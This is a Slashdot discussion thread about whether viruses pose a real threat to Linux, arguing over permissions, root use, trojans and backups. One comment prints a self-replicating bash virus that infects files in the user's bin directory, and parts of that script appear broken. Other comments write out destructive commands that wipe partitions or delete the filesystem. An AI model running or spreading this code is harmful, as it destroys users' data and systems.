Linux Virii On Their Way? 436
Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.
root? (Score:1)
course I'm still a newbie, so they coulda been lying to me.
DUH... (Score:1)
Programs run in user space not kernel space so they can't fsck with your resources.
The virus would have to find a way to get root access.
I can see how something like kernel NFS or the new kernel web server could possibly be exploited to do this, which is why I won't run them.
NJV
Just what we need (Score:1)
Re:root? (Score:1)
Virus or Trojan ? (Score:3)
Viruses/trojans are much less of a problim in *nix simply because most running should be done from unpriviliged users accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.
-- Robert
Security Philosophy is Paramount (Score:3)
Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.
The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.
why only from russia ? (Score:1)
linux virii on the loose!!! (Score:1)
Looks like an antivirus company for 15m of fame (Score:2)
Maybe these russians just thought they could shake up the media a bit if they did that... and
get a fair share of the market, in case a "Antivirus for Linux" ever exists...
Bliss? (Score:2)
My question is, why is slashdot reporting news that has been known for over 2 years?
This will be somewhat of a problem in the future (Score:2)
Of course, this all comes down to system configuration. If the system is properly configured, then viruses would be no problem. But who has the time, or the patience? The average user does not. And it is the average user who falls victim to viruses.
Re:DUH... (Score:1)
Please, before you post comments like this think about them first. There's nothing wrong with being cautious, but there is no need for paranoia.
Linux Anti-Virus (Score:1)
Re:Can we say.... (Score:1)
Shades of Joe McCarthy (Score:2)
I suppose he also has a list in his pocket of 205 communists^H^H^H^H^H^H^H^H^H^H viruses in the Linux department
Re:Virus or Trojan ? (Score:1)
Full Disclosure (Score:1)
We've seen it time and time again. Security through obscurity doesn't work. I still can't believe that there are *professionals* out there that still believe hidding how the software works is really the way to go.
Re:Just what we need (Score:1)
--
Linux proto viruses (Score:3)
what was called a 'proto' virus. Though the virus
only infected the file of that particular user, it
was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected. Because then the sysop has to trace down who else on the system executed files of that user. And trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were avaliale for the whole system.
FUD? (Score:3)
I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle managment and not the technical ranks, I think the technical rank and file who are Linux or Unix literate would just dismiss Kasperskys' claims.
Never knock on Death's door:
Careful With That Virus, Eugene (Score:1)
(with apologies to Pink Floyd)
What of boot sector viruses? (Score:2)
Take it as a flamebait (Score:1)
Yes, there are *real* Linux viruses (Score:5)
Well, there you are wrong. There exist real viruses for Linux. They are not trojans and some of them even look for security holes in other computer so that they can break into them. Some links to the most "famous" ones:
Bliss [datafellows.com]
Staog [datafellows.com]
--
Re:Linux Anti-Virus (Score:2)
Didn't you See the c compiler that built a trojan verson of login, and had the sense to compile it's trojan version of login into all c compilers it compiled even thoguh the source didn't have it? Was a /. artical not too long ago.
Re:DUH (Score:1)
Permissions don't necessarily help (Score:4)
Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.
Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?
No, Linux is not immune to viruses. And as long as buffer overflows and the like continued to be treated as minor oversights and not like the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...
Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?
Regards,
Ben
PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.
Kaspersky is out of his field... (Score:5)
That being said, I also used to hang out on Fido Net's virus echos in 1994 and 1995 where some of the true anti-virus experts hung out too. And yes, I consider Eugine Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word Macro virus (Winword.Concept), he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another word macro which caught and disinfected Winword.Concept).
Unfortunately, I fear this is another case of False Authority Syndrome [kumite.com] in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)
I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.
Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distrubtion is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.
What's wrong with root? (Score:2)
Most of the time I use Linux I am tinkering, recompiling, reinstalling new versions etc... things that require root access. So why bother with the fiction of a 'user' account?
Ok, so I might be exposing myself to a slightly greater risk with regards to Linux viruses - guess that's what backups are for.
-josh
Re:Virus or Trojan ? (Score:2)
That's all fine and dandy for source packages that are just a couple hundred K, but for instance, when I download a new kernel, I simply assume that Linus trusted everyone whose contributions he included. There's no way I want to visually scan 17 Megs of source to make sure there's nothing fishy.
That, plus the fact that a LOT of apps I use are shrink-wrapped. Not many Apps for Linux are without sourcet, but it sounds like it's going to change.
Then what?
The real problem (Score:2)
--The knowledge that you are an idiot, is what distinguishes you from one.
its weakness is also its strength (Score:2)
The "security expert" has a point, but does not seem to be seeing the whole picture. Open source might make it easier for malicious virus-writers to exploit Linux... but it also makes it easier for the rest of us to see what devious tricks they're up to and protect ourselves. I'm going to be generous and suggest that there are more of us than there are of them. There are probably better minds working on the "good-guy" team too.
I don't see how this would make Linux viruses "worse", though theoretically they could be more prevalent. In that unusual scenario, it might be advisable for the uninformed newbies to stick with closed-source OS'es (like they don't already?), since they don't yet know how to protect themselves.
Windows et at might then rightfully be seen as "training wheels" OS'es, for people to use until they learn what they're doing and are ready to graduate to open source.
As most viruses in the real world are NOT written to exploit open-source OS'es, even that argument doesn't apply in reality. If it's not a good entry-level OS (for security reasons), what IS Windows good for?
Re:Security Philosophy is Paramount (Score:2)
Have you heard that people are considering Linux to be almost ready to replace Windows on the desktop? Well, one user on a single user system can easily hose all of his files, so that theory doesn't really hold.
Good opportunity to educate, this (Score:3)
But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.
Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.
this is easier than you think (Score:2)
- a) less than saavy users. download some untrustworthy source or kernel source or even some binaries and voila, point of infection.
- b) distro poisoning, easier said than done (remember tcp_wrappers got infected, too)
- c) worm style incidents using poorly known holes in major distros (ie Linuxconf vulnerabilities, Apache holes, etc..).
it's a lot easier than some of you may think. a scenario for you: mirror mirror.example.com gets rooted and trojans of key RPM's of the latest RedHat distro are plced in. MD5 sums are altered and the whole thing loks legit. once installed, the packages (gcc, a kernel module, and a few access trojans like telentd or sshd) lie in wait. the kernel module keeps the user from seeing the problem, gcc's trojan always keeps trojans in the system, and the listening entry points are there and well hidden. bingo, you have a problem. say, in a TFN or Trin00 manner you manipulate the systems to rm -rftrust is a magical thing to abuse. and users' trust is getting greater and greater. how many times has the schlub in the cubicle next to you downloaded some spiffy screensaver from the net or run some "executable" from their email? all too often... :)
bear in mind that thompson build a cc trojaned to allow him to log in specially on any box using his cc, which also built it's trojan propogating systems in, too. :) thompson's not malicious, but some people are.
think about all the s|
Portable Unix Virus (Score:3)
Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.
#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676
seed=1
function srandom () { seed=$[$$+`date +%s`] }
function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }
function choose () {
shift `random $#`
echo $1
}
function infected () {
head -2 $1 | tail -1 | grep $signature >
}
function infect () {
# pathlist=`echo $PATH | tr : " "`
# dir=`choose $pathlist`
dir=$HOME/bin
echo "Will infect in $dir"
names=`find $dir -maxdepth 1 -type f`
name=`choose $names`
echo "will infect $name"
if infected $name; then
echo Already infected
else
if [ ! -w $name ]; then
notwrite=1
chmod u+w $name
fi
if [ -w $name ]; then
infectfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
(head -$[$skip-1] $0; cat $name) > $infectfile
cat $infectfile > $name
rm -f $infectfile
if [ x$notwrite = x1 ]; then
chmod u-w $name
fi
echo success
else
echo Darn, no write permissions
fi
fi
}
srandom
tmpfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
if tail +$skip $0 > $tmpfile; then
infect
chmod 700 $tmpfile
prog="`echo $0 | sed 's|^.*/||'`"
if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
(sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
else
trap 'rm -f $tmpfile; exit $res' 0
(sleep 5; rm -f $tmpfile) 2>/dev/null &
$tmpfile ${1+"$@"}; res=$?
fi
else
echo Cannot decompress $0; exit 1
fi; exit $res
true
Linux is a virus in itself (Score:5)
It spreads from user to user, and once you're infected, you can never go back.
It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
Klooless Noobies (Score:3)
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.
So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh?
Re:Just what we need (Score:2)
How convenient! This reminds me of the story about Novell's CEO a few months back. He claimed that his CC number was stolen on the internet, and what do you know, the best way to keep this from happening just happens to involve Novell software.
Ian "zsazsa" Scott
Virus != Trojan (Score:2)
A virus might attach itself to a benign program, thus transforming that program into an unwitting trojan, or a trojan might deliver a non-self-replicating program - even a virus killer.
Of course either of the two can exist on Linux, but Linux (and all Unices) have security mechanisms to minimise the damage done by, and propagation of, these beasties.
It would be interesting (Score:2)
Re:What of boot sector viruses? (Score:2)
Re:The real problem (Score:2)
*nix and Viruses (Score:5)
- There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
- Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them. but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
- Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with a email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.
So, what it comes down to is that, in general, Unix viruses are not (and will not) be a problem, but that Linux has vunerabilities that make it less secure than Unix used to be.--
Good. Bring them on. (Score:2)
Answer:
After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of the sudden will be. And people will start thinking before make && make install
It can't kill us, and what doesn't kill us only makes us stronger.
Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.
No OS is really immune (Score:3)
Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.
Virii is not a word (Score:2)
Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices.
What, you don't think that's a real word either? Damn language nazis...
Re:Security Philosophy is Paramount (Score:2)
Of course, if you always boot a system to single-user mode, or if you always log in as root, yes, you can do some serious damage. But anyone who has spent time in QA will tell you that "idiotproof" really means "not yet subjected to critical levels of stupidity."
Re:Kaspersky is out of his field... (Score:4)
I think what he's most concerned about is the fact that a malicious hacker can construct a more potent virus since he has access to the OS's source. Linux is most definitely more popular than it was a couple years ago, which makes it more interesting to virus writers, or certain other OS companies who may benefit in discrediting Linux.
What Kaspersky overlooks is that Linux is a constantly evolving OS. As long as that remains the case, Linux could evolve an immune system to counteract viruses, either by seeking them out or by fixing weaknesses that virus writers find.
-Jennifer
You're right, but you're wrong. (Score:2)
Automated library-level checking, whether using a stackguarded compiler or weird stack hacks in the OS is no way to make an app buffer-overflow secure. The only way to do it is continuous human code auditing (and careful initial coding practices), à la OpenBSD. OpenBSD is tight, carefully audited, and in fact provides surprisingly little as far as applications. The size of a typical Linux install is a huge enemy of auditing -- there's just too much stuff to go through. You can however build quite a secure system (assuming you don't have any untrusted local users) simply by strictly limiting which services your machine offers to the outside.
The Internet Worm won't happen again in the UNIX world -- we learned our lesson at the time about poorly written programs and known problems. M$, typically, still hasn't figured this one out. The only reason UNIX users won't be vulnerable to Word Macro-type viruses is that no UNIX user would use such a pathitically stupid application -- and a UNIX user would know better than to execute a random chunk of code he found lying around.
Of course the user can still screw himself if he's dumb, but that's not fundamentally against the UNIX mentality -- 'rm -Rf *' has always been there waiting for you.
...
Actually, a real problem is the fact that most users go looking all over the internet for RPMs of their latest gotta-have applications, without checking the origins. Downloading RPMs from random webpages and installing them as root could be a very bad idea.
Re:*nix and Viruses (Score:2)
Tosh. Linux is no less a unix than any other flavour that's gone its own sweet (and in some cases, commercial) way.
It is also no less "unix" because you often get only one person using it; in case you'd not heard, there are one or two machines in existence that run multi-user stuff as well as poxy desktops. Cobalt Cube, and all that. In some cases, RDBMS servers. And so on.
Of course, if you have a linux box as your only OS in your room, and clone yourself across the entire USA, then I'd see why there might be a problem - you've got the same OS throughout, and any
However, if you keep yourself uptodate with security patches, as you should, then you'll keep the enemy at bay for far longer.
The separation between "user space" and OS-space in terms of ACLs is essential here; am I the only one that doesn't want clueless lusers sullying thing good name of Linux by their demands for bad practice?
Sure, Linux viruses might be worse... (Score:2)
The thing is, all other things are not equal.
The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user.
Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error.
What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about then MS-Windows users.
The "It's hard to gain root access" fallacy (Score:4)
It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?
Although it is true that Linux (and Unices in general) tend to give less motivations for virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork( ) bombs? Or HD space hoggers that cause you to be unable save your latest document? The system may be less vulnerable, but your data isn't.
Re:Huh? (Score:3)
You are probably thinking of second declension masculine masculine Latin nounds (there are lots of them). The nominative singular ending for these nouns is -us. The nominative plural is -i (note just one i, not two (or i not ii in Roman numerals)).
There are other declensions that use -us in the nominative singular and something different in the plural. For example, third declension nouns of any gender may end in -us in the nominative singular, while the nominative plural ending for masculine nouns is -es.
I realize that I may be one of the only Slashdot geeks to have majored in Classical Languages instead of Computer Science, and no pedantry was intended in this post.
Re:Security Philosophy is Paramount (Score:2)
What i said was:
If a user has privledges to open and modify their own files, then a virus running in their user mode would have the ability to open, change and delete them as well.
Yeah, the system will stay up, but it as it is, it does nothing for protecting the users' own files. Something needs to happen to prevent an errant program from destoying all the files it's allowed to touch. But how would a utility discern between a bash script being run by the user or a script being launched be an application?
Re:What's wrong with root? (Score:2)
Re:Linux is a virus in itself (Score:2)
300M is bloat. I can match the default functionality of NT 4.0 and still fit it on a 40M Seagate.
Re:Linux is a virus in itself (Score:2)
Things that make Linux harder/easier to attack (Score:4)
Some things that are going to make Linux easier to attack:
One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.
The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.
Heh heh heh (Score:3)
Microsoft will blame it on the poor security model in Linux.
Re:*nix and Viruses (Score:4)
The technical hurdle, as low as it might be, is important. By the time you are sufficiently knowledgable to be dangerous, you're usually intelligent enough to know _why_ this behavior is frowned upon. And have channeled your behaviors into more socially acceptable (and might I add, more rewarding) behaviors. Most decent sysadmins could be hackers and virus writters of legendary proportions. Generally, they aren't.
The open source nature of Linux even helps here- as now there are other ways for a bright teenager to gain fame and technical esteem than writting virii. Instead, they can write kernel patches, or work on Gnome or Abiword, or write their own programs- in other words they can do something _productive_ rather than _destuctive_ programs. I'm kind of interested to see what a couple million chinese programmers can create. I doubt it'll be virii
Re:Portable Unix Virus (Score:2)
Virusses on Linux and the One known Linux virus (Score:3)
Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.
A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.
Virusses would also have to fear programs like tripwire which take checksums of vital executables. This is another good reason to use tripwire and related products. While it is possible to defeat tripwire it would involve more code than a virus is likely to want to carry in its payload.
Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.
Unless you code your virus in a macro language, the cross platform nature of Linux will also bog down the prospective virus writer. Since the archetectures are very different and virusses usually do very low level stuff, he'd have to port the machine dependent code to the various Linux platforms. On the plus side he could use cvs and bugzilla so that his users could report bugs with his virus.
Sure... (Score:2)
Re:Virus or Trojan ? (Score:3)
- Trojan Horse: named, of course, for the classic crack of the city of Troy by the Greeks. A Trojan Horse program is advertized to be something benign, but actually has it in for you. The user has to run a Trojan Horse for it to be able to attack. Many macro "viruses" fall into this category. Trojans are hard to hide in open source software, and if they are run by an ordinary user they are limited in the damage they can do.
- Worm: a worm crawls from machine to machine across a network without user intervention. They often take advantage of bugs in network servers to spread - and since these servers often have root access, they can be more damaging than Trojans. Sometimes they leave a copy of themselves behind, sometimes not. The famous Internet worm is the best example. There is at least one worm that infects Linux machines (I was hit by it a year or two back on a loosely administered box; didn't seem to affect anything other than put a "w0rm" entry in my
/etc/passwd.) - Virus: a virus infects specific executable files and reproduces to infect other files. (Macros make word processor documents into executable files, thus allowing macro viruses to exist. Emacs had the same problem with file variables, but the dangerous behavior is now off by default.) Unlike a worm or a trojan, the virus is (generally) a code fragment, not a complete program in and of itself - just as a DNA or RNA virus is a fragment of genetic material, not a complete living genome.
There are a few other types, but these are the main ways that malware can get into your system. To complicate life, some malware exhibits behavior from more than one of these categories.Quotas... or... (Score:2)
Re:The "It's hard to gain root access" fallacy (Score:2)
There is a kernel module that replaces the exec() call (I think) and provides the exact protection you are asking about. You can tune the amount of forking by user and it also (IIRC) supports logging of "over-fork" conditions.
Where is it? Here [freshmeat.net] is a link to Freshmeat [freshmeat.net].
Re:Yes, there are *real* Linux viruses (Score:2)
The linux kernel takes over everything, so basically there shouldn't be any possibility for extraneous code to survive the boot process.
Of course, you could "infect" in some way a kernel image, but one has to be already root in order to do that, so basically it's pointless.
The problems arise when the user acts as a dumb monkey *as root*. There's little that you could do when some of your fundamental binaries are replaced by trojans (think of
So:
1) Don't take it too easy when you download something precompiled. Those md5sums are there for a reason, so use them!
2) Don't run as root when you don't need to. Use utilities like "sudo" only on trusted binaries.
3) Don't install something as root if you don't need to (in fact, there's little that actually NEEDS to be installed as root, and pratically nothing that actually NEEDS to stay necessarily in
The first beta of WordPerfect 8 for Linux was known for producing a possible security hole when installed as root, and the usual advice (until it was corrected) was to create a particular user just for WordPerfect binaries. Not a virus, not a trojan, but just a mistake. You can always do something like this for binaries that you don't trust 100%.
The remaining advice is the usual: make backups of data, make backups of data and still make backups of data. And possibly make a backup of your configuration files (not binaries, because reinstalling a Linux distribution from scratch generally doesn't take more that 1 hour, which shouldn't be a problem in a home environment). A CD recorder is something cheap enough that could do well today for home backups, if you can't afford a more expensive tape streamer.
Keep in mind these basic principles, and trojans will stay away from you for a loooooong time.
My 0.00001 Euro
How to be 99.999% secure (Score:3)
With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.
Suggestions:
Re:Linux proto viruses (Score:2)
Funny, I thought that was what BSD process accounting was for. Track all the executions and return codes of all programs. Then there's also the kernel module that tracks every exec().
I mean come on, if you're going to admin, don't be half-assed about it. Get your tcp loggers and your exec() loggers and set your user limits and WATCH the damn system. Don't set it up, leave it go and complain when you got rooted by a 6-week old exploit since you were surfing for pr0n instead of watching the security lists.
The Pariable of the Root-Running Dipshit (Score:3)
And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.
And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.
And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.
Re:Nah, not the kernel.... (Score:2)
I don't know about your servers, but my
Public Challange (Score:2)
Not much different than rm -rf . /* (Score:2)
The upshot is that users in the know back up their critical data on a regular basis. If you can't be bothered to do that, don't expect any sympathy from anyone.
Re:But this is where your plan fails (Score:2)
echo -e 'd\n1\nd\n2\nd\n3\nd\n4\n' | fdisk
I think it's a good habit to be the only one who knows the root password.
One word: Tripwire (Score:2)
Resource limits (Score:2)
Disk quotas can prevent users from filling up filesystems, also.
Re:As long as we're fighting about it... (Score:2)
i was more or less under the impression that "virile" (from latin "vir" meaning "man," i believe--akin to "puerile" from "puer" = "boy") referred to the sexual capability of a male, and that the correct word to describe a particularily nasty virus was "virulent." anyone want to correct me?
No agrument here, a natural virus would be virulent. But its kinda funny to think about a "virile" computer virus. I think it would be one that automatically redirected your web browser to porn sites and guns.com :-)
Or maybe popped up messages like "is my CD drive open or am I just happy to see you?" and "Are you implying I could ever have a soft drive?"
Re:*nix and Viruses (Score:2)
For this class of user, the potential for a Linux virus infection is much greater, since lots of Linux newbies (like their Windows counterparts) will quite happily run things as root without knowing what they do or where it came from.
A few reflexions (Score:2)
Re:That's why you back up your home directory! (Score:2)
Re:The "It's hard to gain root access" truth (Score:2)
Not quite true. If a virus deletes my entire home directory, and I'm smart, I just whip out the latest backup CD-R and do the restore as root. Voila, no more virus.
On the other hand, if a virus infects my system running as root or infects my Windows system, there is nothing short of a reinstall I could do to make sure my system is secure. That virus might have infected anything on the system, from
And frankly, I have to reinstall Windows often enough when it's virus-free. I haven't reinstalled Linux in years, and I'd like to keep it that way.
Virii that exploit bugs? Been there, done that. (Score:2)
Well, look at the Linux/Stoag [datafellows.com] computer virus. It does exactly what we're worrying about in exploit bugs.
Linux as an operating system is, in actuality, a lot more insecure than we'd like to admit. To prove my point, look at RedHat's Linux 6.1 Security Advisories [redhat.com] page. How many of these packages were fixed to prevent root exploits? Five of thirteen. But look at how common some of these five are!
Malicious people can use lpr of all things! Another famous example: bind. Or how about wu_ftpd? Those two, alone, are present alone on how much of the linux community?
Honestly, were it not for freshmeat.net [freshmeat.net], I probably would not have discovered the existance of the new packages. (I don't check RedHat's site often. And I don't signup for mailing lists either... So this is my fault.)
There are script kiddies out there who can manipulate the overflows in bind. (Please, for the love of God, if you haven't updated to bind 8.2.2_P3, go do so!) If a script kiddie can find a way to do that, then some coder worth his paycheck can probably figure out a way to have a program manipulate itself into root that way.
I mean, all some perverse (or highly bored) programmer has to do is write a program to manipulate those bugs to get root... And then run rm -rf / to kill your machine. (There are, of course, nastier things one could do, but the less ideas I generate for others, the better.)
By no means, are we safe. Linux virii will eventually be created and released into the wild. (There are even some that claim that MicroSoft will be the origin for the epidemic.)
The only way we can keep ourselves truly safe is to catch security holes before the other side does and update our source packages before the attacks start.
There is a saying in network security: "One loose link is all you need."
Re:*nix and Viruses (Score:2)
Windoze viruses spread so fast because the users let them - put a windows user on a linux box, and a virus will spread as fast there as it did under windows.
I am responsible for virus control at the company I work for, and the number of users who will blindly answer "yes" to anything that appears on their screen is staggering - particularly on occasion if I am standing there watching them, having just told them off for getting the LAST infestation. Thank $DIETY at least SOME of my users have gotten the basic idea
--
It's naive to think it can't happen. (Score:2)
--
One point that has been missed here (Score:2)
However, most newbies don't run any binaries (or even scripts) that they have write access to! How is a file infector going to work if all their executables are owned by root and they don't have write access?
Re:Linux proto viruses (Score:2)
Seriously, simply tossing in tripwire (and kin) is *not* adequate -- and in fact it leads to a false sense of security. The problem is that anyone with root access could modify the files, reinitialize the database, and the changes are indetectable.
Even if your database is safe (e.g., CD-R, or r/o NFS directory), are you sure that tripwire hasn't een tampered with? That the crontab entry hasn't been tampered with? That the tripwire reports aren't disappearing down a rabbit hole?
Don't get me wrong - tripwire is an extremely valuable tool, but unless the sysadmins knows what they're doing it can be easily circumvented by any knowledgable person with root access. Or by any script writer who knows how to check for the existence of local tripwire databases, for the times it runs as root and can do something nasty.
Bill in Jail! (Score:2)
Re:Linux is a virus in itself (Score:2)
Take a look at muLinux (search fm, forgot the URL). On one floppy, it contains a large number of server daemons, plus a fair amount of small apps. Add another floppy, and you have X11 with a simple graphical browser and choice of 3 windowmanagers. Add another - extra kernel modules, scsi, and other goodies. Another - GCC and headers. A 5th - x/svncviewer. The sixth floppy has Tcl/Tk. Each floppy is 1722k, so that adds up to... 10332k - a little over 10M. Windows can't TOUCH that amount of functionality. in that little space.
"If ignorance is bliss, may I never be happy.
How about Emacs? (Score:2)
:-)
Cheers,
Ben
Re:yeah...ummm (Score:2)
--
linuxisgood:~$ man woman
Re:yeah...ummm (Score:2)
Indeed.
It is also important to consider the security advantage of a separate /var partition, Since this is where logs go. Allowing an attacker to fill your root partition with log info would likely be very bad.
What protects us... (Score:2)
Viruses are on the way, and will most likely be even more attractive for Linux than WinXX. By writing a WinXX virus, I have to fool a virus checker, and even then I can generally only affect the clients of an organization. And if you have the "." in your path?? You're a great target. Plus, I can just start taking out your linux machines, your print servers, your databases, have a trojan report back keystrokes and network stats until it blows up?? Doable. And the virus will most likely not be open source.
Plus, what about companies like Norton?? I have this sneaking suspicion that they actually create some of these viruses, both to increase the value of their own product, and to devalue the product of a competitor. (You'd be surprised at the viruses I've seen that only one virus checker can find when they all have updated defs.) I know that this delves into the realm of conspiracy theory, but if theres a Dr. Solomon's for linux, there will have to be a virus for it to find. And if linux gets a good mindshare....
P.S. I wrote quite a bit of Unix virii back in the day, and it ain't that difficult.
Just My 0.02
Jason
Re:DUH... (Score:2)
No, all you need to do is trick the user in running something as root. For instance, offering him some nice looking software, and infect the system during "make install". You might even wrap it in a PGP signed RPM, with available fingerprints, and do the same trick when the RPM is installed.
-- Abigail
Re:Security Philosophy is Paramount (Score:2)
I beg to differ. That would be just too damn annoying for people who do know what they are doing. And for people who don't, well, though luck. People with no Unix experience shouldn't admin a Unix box - let alone install a Unix system. Either get experience as a user, or just run Windows. That's why M$ exists.
-- Abigail
Re:HUMOR:Linux is a virus in itself (Score:2)
You'd think somebody (those other guys) forgot to include humor.h, or somebody urinated in their Cheerios this morning.
Re:yeah...ummm (Score:2)
--
linuxisgood:~$ man woman
